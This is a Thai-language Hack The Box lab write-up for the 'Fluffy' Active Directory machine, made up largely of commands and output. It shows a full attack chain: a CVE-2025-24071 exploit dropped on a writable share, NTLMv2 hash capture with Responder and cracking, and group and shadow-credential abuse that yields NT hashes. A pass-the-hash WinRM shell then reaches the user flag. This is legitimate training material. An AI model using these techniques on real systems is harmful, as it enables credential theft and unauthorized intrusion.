



เริ่มที่ Nmap เพื่อดูว่ามี Service อะไรเปิดอยู่บ้าง

```
$ IP=10.10.11.69
ports=$(sudo nmap -Pn -sS -p- -T4 ${IP} | grep -E '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p${ports} -sC -sV ${IP}
[sudo] password for nnkm:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 14:50 +07
Nmap scan report for 10.10.11.69
Host is up (0.091s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-14 14:24:40Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-14T14:26:12+00:00; +6h34m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-14T14:26:11+00:00; +6h34m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-09-14T14:26:12+00:00; +6h34m14s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-14T14:26:11+00:00; +6h34m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49718/tcp open  msrpc         Microsoft Windows RPC
49730/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-09-14T14:25:36
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h34m13s, deviation: 0s, median: 6h34m13s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.16 seconds
```

bloodhound-python

```
$ bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d fluffy.htb -v --zip -c All -dc fluffy.htb -ns 10.10.11.69 
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
[...]
INFO: Compressing output into 20250916060829_bloodhound.zip


$ ls
20250916060829_bloodhound.zip
```


smbmap

```
$ smbmap -H 10.10.11.69 -u j.fleischman -p J0elTHEM4n1990!
[...]
[-] Enumerating shares...
[+] IP: 10.10.11.69:445 Name: 10.10.11.69          Status: Authenticated
        Disk                          Permissions     Comment
        ----                          -----------     -------
        ADMIN$                        NO ACCESS       Remote Admin
        C$                            NO ACCESS       Default share
        IPC$                          READ ONLY       Remote IPC
        IT                            READ, WRITE
        NETLOGON                      READ ONLY       Logon server share 
        SYSVOL                        READ ONLY       Logon server share 
[\] Closing connections.. 
[...]
```

smbclient

```
$ smbclient //10.10.11.69/IT -U 'j.fleischman%J0elTHEM4n1990!' -c 'recurse; prompt; mget *' -W fluffy.htb
getting file \Everything-1.4.1.1026.x64.zip of size 1827464 as Everything-1.4.1.1026.x64.zip (1376.0 KiloBytes/sec) (average 1376.0 KiloBytes/sec)
getting file \KeePass-2.58.zip of size 3225346 as KeePass-2.58.zip (354.7 KiloBytes/sec) (average 484.8 KiloBytes/sec)
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (360.0 KiloBytes/sec) (average 479.4 KiloBytes/sec)
getting file \Everything-1.4.1.1026.x64\everything.exe of size 2265104 as Everything-1.4.1.1026.x64/everything.exe (1046.9 KiloBytes/sec) (average 573.4 KiloBytes/sec)
getting file \Everything-1.4.1.1026.x64\Everything.lng of size 958342 as Everything-1.4.1.1026.x64/Everything.lng (1308.9 KiloBytes/sec) (average 612.5 KiloBytes/sec)
getting file \KeePass-2.58\KeePass.chm of size 768478 as KeePass-2.58/KeePass.chm (1309.7 KiloBytes/sec) (average 640.9 KiloBytes/sec)
getting file \KeePass-2.58\KeePass.exe of size 3305824 as KeePass-2.58/KeePass.exe (1899.0 KiloBytes/sec) (average 776.8 KiloBytes/sec)
getting file \KeePass-2.58\KeePass.exe.config of size 763 as KeePass-2.58/KeePass.exe.config (2.9 KiloBytes/sec) (average 764.4 KiloBytes/sec)
getting file \KeePass-2.58\KeePass.XmlSerializers.dll of size 463264 as KeePass-2.58/KeePass.XmlSerializers.dll (890.6 KiloBytes/sec) (average 768.3 KiloBytes/sec)
getting file \KeePass-2.58\KeePassLibC32.dll of size 609136 as KeePass-2.58/KeePassLibC32.dll (582.6 KiloBytes/sec) (average 757.5 KiloBytes/sec)
getting file \KeePass-2.58\KeePassLibC64.dll of size 785776 as KeePass-2.58/KeePassLibC64.dll (1009.7 KiloBytes/sec) (average 767.9 KiloBytes/sec)
getting file \KeePass-2.58\License.txt of size 18710 as KeePass-2.58/License.txt (74.9 KiloBytes/sec) (average 758.8 KiloBytes/sec)
getting file \KeePass-2.58\ShInstUtil.exe of size 97128 as KeePass-2.58/ShInstUtil.exe (329.3 KiloBytes/sec) (average 752.2 KiloBytes/sec)
getting file \KeePass-2.58\XSL\KDBX_Common.xsl of size 2732 as KeePass-2.58/XSL/KDBX_Common.xsl (10.1 KiloBytes/sec) (average 741.9 KiloBytes/sec)
getting file \KeePass-2.58\XSL\KDBX_DetailsFull_HTML.xsl of size 3556 as KeePass-2.58/XSL/KDBX_DetailsFull_HTML.xsl (13.3 KiloBytes/sec) (average 732.1 KiloBytes/sec)
getting file \KeePass-2.58\XSL\KDBX_DetailsLight_HTML.xsl of size 3098 as KeePass-2.58/XSL/KDBX_DetailsLight_HTML.xsl (11.1 KiloBytes/sec) (average 722.1 KiloBytes/sec)
getting file \KeePass-2.58\XSL\KDBX_PasswordsOnly_TXT.xsl of size 919 as KeePass-2.58/XSL/KDBX_PasswordsOnly_TXT.xsl (3.6 KiloBytes/sec) (average 713.1 KiloBytes/sec)
getting file \KeePass-2.58\XSL\KDBX_Tabular_HTML.xsl of size 3100 as KeePass-2.58/XSL/KDBX_Tabular_HTML.xsl (11.8 KiloBytes/sec) (average 704.1 KiloBytes/sec)

$ ls
Everything-1.4.1.1026.x64      KeePass-2.58      Upgrade_Notice.pdf
Everything-1.4.1.1026.x64.zip  KeePass-2.58.zip
```

CVE-2025-24071

<b>URL:</b> https://github.com/FOLKS-iwd/CVE-2025-24071-msfvenom

```
$ python3 exploit.py -i 10.10.11.69 -f reverse
[...]        
    Windows File Explorer Spoofing Vulnerability (CVE-2025-24071) by ThemeHackers

Creating exploit with filename: reverse.library-ms
Target IP: 10.10.11.69

Generating library file...
✓ Library file created successfully

Creating ZIP archive...
✓ ZIP file created successfully

Cleaning up temporary files...
✓ Cleanup completed

Process completed successfully!
Output file: exploit.zip
Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.
```

responder

```
$ sudo responder -I tun0
[sudo] password for nnkm: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.27]
    Responder IPv6             [dead:beef:2::1019]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-R6BUX9WOAXS]
    Responder Domain Name      [NLEE.LOCAL]
    Responder DCE-RPC Port     [49621]

[+] Listening for events...
```


```
$ smbclient -U 'fluffy.htb/j.fleischman%J0elTHEM4n1990!' //10.10.11.69/IT
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep 16 03:54:09 2025
  ..                                  D        0  Tue Sep 16 03:54:09 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 22:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 22:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 22:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 22:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 21:31:07 2025

                5842943 blocks of size 4096. 1764881 blocks available
smb: \> put exploit_fixed.zip
putting file exploit_fixed.zip as \exploit_fixed.zip (1.9 kb/s) (average 1.9 kb/s)
smb: \> ls
  .                                   D        0  Tue Sep 16 03:59:59 2025
  ..                                  D        0  Tue Sep 16 03:59:59 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 22:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 22:04:05 2025
  exploit_fixed                       D        0  Tue Sep 16 04:00:00 2025
  exploit_fixed.zip                   A      375  Tue Sep 16 03:59:51 2025
  KeePass-2.58                        D        0  Fri Apr 18 22:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 22:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 21:31:07 2025

                5842943 blocks of size 4096. 1768653 blocks available
smb: \> exit
```


```
[...]
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:2dfeb48302aa23f5:4A89E4AF4180399456445DE4A2ACF9C1:010100000000000080AE5746C026DC017C82A6A069DBFB4100000000020008004F0044005400560001001E00570049004E002D00540042003000360033004600560036004B004900570004003400570049004E002D00540042003000360033004600560036004B00490057002E004F004400540056002E004C004F00430041004C00030014004F004400540056002E004C004F00430041004C00050014004F004400540056002E004C004F00430041004C000700080080AE5746C026DC0106000400020000000800300030000000000000000100000000200000A887D10AE75D339C2728B1713F1C74C1044F6BC865BFBE8D13F61ABDC50F90C40A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100300032000000000000000000
[*] Skipping previously captured hash for FLUFFY\p.agila
```


```
$ echo "p.agila::FLUFFY:2dfeb48302aa23f5:4A89E4AF4180399456445DE4A2ACF9C1:010100000000000080AE5746C026DC017C82A6A069DBFB4100000000020008004F0044005400560001001E00570049004E002D00540042003000360033004600560036004B004900570004003400570049004E002D00540042003000360033004600560036004B00490057002E004F004400540056002E004C004F00430041004C00030014004F004400540056002E004C004F00430041004C00050014004F004400540056002E004C004F00430041004C000700080080AE5746C026DC0106000400020000000800300030000000000000000100000000200000A887D10AE75D339C2728B1713F1C74C1044F6BC865BFBE8D13F61ABDC50F90C40A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100300032000000000000000000" > p.agila.hash

$ cat p.agila.hash 
p.agila::FLUFFY:2dfeb48302aa23f5:4A89E4AF4180399456445DE4A2ACF9C1:010100000000000080AE5746C026DC017C82A6A069DBFB4100000000020008004F0044005400560001001E00570049004E002D00540042003000360033004600560036004B004900570004003400570049004E002D00540042003000360033004600560036004B00490057002E004F004400540056002E004C004F00430041004C00030014004F004400540056002E004C004F00430041004C00050014004F004400540056002E004C004F00430041004C000700080080AE5746C026DC0106000400020000000800300030000000000000000100000000200000A887D10AE75D339C2728B1713F1C74C1044F6BC865BFBE8D13F61ABDC50F90C40A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100300032000000000000000000
```


```
$ john --list=formats | egrep -i 'ntlm|netntlm'
414 formats (149 dynamic formats shown as just "dynamic_n" here)
net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns,

$ john --format=netntlmv2 --wordlist=/usr/share/seclists/rockyou.txt p.agila.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)     
1g 0:00:00:01 DONE (2025-09-16 04:32) 0.5952g/s 2691Kp/s 2691Kc/s 2691KC/s pu888..prisom
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```

มาดู BloodHound
{img2}

```
$ rpcclient -U 'p.agila%prometheusx-303' 10.10.11.69
rpcclient $> getusername
Account Name: p.agila, Authority Name: FLUFFY
rpcclient $> srvinfo
        10.10.11.69    Wk Sv PDC Tim NT     
        platform_id     :       500
        os version      :       10.0
        server type     :       0x80102b
rpcclient $> queryuser WINRM_SVC
        User Name   :   winrm_svc
        Full Name   :   winrm service
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Thu, 25 Sep 2025 00:41:36 +07
        Logoff Time              :      Thu, 01 Jan 1970 07:00:00 +07
        Kickoff Time             :      Thu, 14 Sep 30828 09:48:05 +07
        Password last set Time   :      Sun, 18 May 2025 07:51:17 +07
        Password can change Time :      Mon, 19 May 2025 07:51:17 +07
        Password must change Time:      Thu, 14 Sep 30828 09:48:05 +07
        unknown_2[0..31]...
        user_rid :      0x643
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000003
        padding1[0..7]...
        logon_hrs[0..21]...
rpcclient $> 
rpcclient: missing argument
rpcclient $> setuserpassword WINRM_SVC NewPassw0rd!
command not found: setuserpassword
rpcclient $> setuserinfo2 WINRM_SVC 23 NewPassw0rd!
result: NT_STATUS_ACCESS_DENIED
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
$ rpcclient -U 'p.agila%prometheusx-303' 10.10.11.69
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

```


ใช้เครื่องมือ `bloodyAD` เพิ่มบัญชี `p.agila` เข้าไปในกลุ่ม `service accounts`

```
$ bloodyAD -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb --host 10.10.11.69 add groupMember 'Service Accounts' p.agila    
[+] p.agila added to Service Accounts


$ ldapsearch -x -H ldap://10.10.11.69 -D 'p.agila@fluffy.htb' -w 'prometheusx-303' -b "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" member
# extended LDIF
#
# LDAPv3
# base <CN=Service Accounts,CN=Users,DC=fluffy,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: member 
#

# Service Accounts, Users, fluffy.htb
dn: CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
member: CN=winrm service,CN=Users,DC=fluffy,DC=htb
member: CN=Prometheus Agila,CN=Users,DC=fluffy,DC=htb
member: CN=ldap service,CN=Users,DC=fluffy,DC=htb
member: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1


$ bloodyAD -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb --host 10.10.11.69 get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=fluffy,DC=htb
permission: WRITE

distinguishedName: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
permission: WRITE

distinguishedName: CN=ldap service,CN=Users,DC=fluffy,DC=htb
permission: WRITE

distinguishedName: CN=Prometheus Agila,CN=Users,DC=fluffy,DC=htb
permission: WRITE

distinguishedName: CN=winrm service,CN=Users,DC=fluffy,DC=htb
permission: WRITE

distinguishedName: CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE


$ ldapsearch -x -H ldap://10.10.11.69 -D 'p.agila@fluffy.htb' -w 'prometheusx-303' -b "CN=winrm service,CN=Users,DC=fluffy,DC=htb" sAMAccountName
# extended LDIF
#
# LDAPv3
# base <CN=winrm service,CN=Users,DC=fluffy,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: sAMAccountName 
#

# winrm service, Users, fluffy.htb
dn: CN=winrm service,CN=Users,DC=fluffy,DC=htb
sAMAccountName: winrm_svc

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```

```
$ certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account winrm_svc                                             
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '23a4d46a-c6ac-77a9-3f14-7540fdb3ae2c'
[*] Adding Key Credential with device ID '23a4d46a-c6ac-77a9-3f14-7540fdb3ae2c' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '23a4d46a-c6ac-77a9-3f14-7540fdb3ae2c' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': None
```


```
$ date                                          
Thu 25 Sep 2025 01:46:04 AM +07


$ sudo ntpdate 10.10.11.69
[sudo] password for nnkm: 
2025-09-25 08:20:19.078124 (+0700) +23627.590266 +/- 0.078716 10.10.11.69 s1 no-leap
CLOCK: time stepped by 23627.590266
```


```
┌──(htb_venv)─(nnkm㉿nnkm)-[~/htb/machines/Fluffy]
└─$ certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account winrm_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2643f140-0d4b-520e-941e-707c8c1baed9'
[*] Adding Key Credential with device ID '2643f140-0d4b-520e-941e-707c8c1baed9' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '2643f140-0d4b-520e-941e-707c8c1baed9' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
                                                                                                
┌──(htb_venv)─(nnkm㉿nnkm)-[~/htb/machines/Fluffy]
└─$ certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account ca_svc   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'e42fc0b8-0b35-8785-6ad9-d719ac9ca41a'
[*] Adding Key Credential with device ID 'e42fc0b8-0b35-8785-6ad9-d719ac9ca41a' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'e42fc0b8-0b35-8785-6ad9-d719ac9ca41a' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
                                                                                                
┌──(htb_venv)─(nnkm㉿nnkm)-[~/htb/machines/Fluffy]
└─$ certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account ldap_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f2f5bcd5-0e5a-893c-480e-e7708de52491'
[*] Adding Key Credential with device ID 'f2f5bcd5-0e5a-893c-480e-e7708de52491' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID 'f2f5bcd5-0e5a-893c-480e-e7708de52491' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Using principal: ldap_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
```



```
$ evil-winrm -i 10.10.11.69 -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'
```

```
$ evil-winrm -i 10.10.11.69 -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                           
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/24/2025   8:48 AM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
5430[...]ca079
```
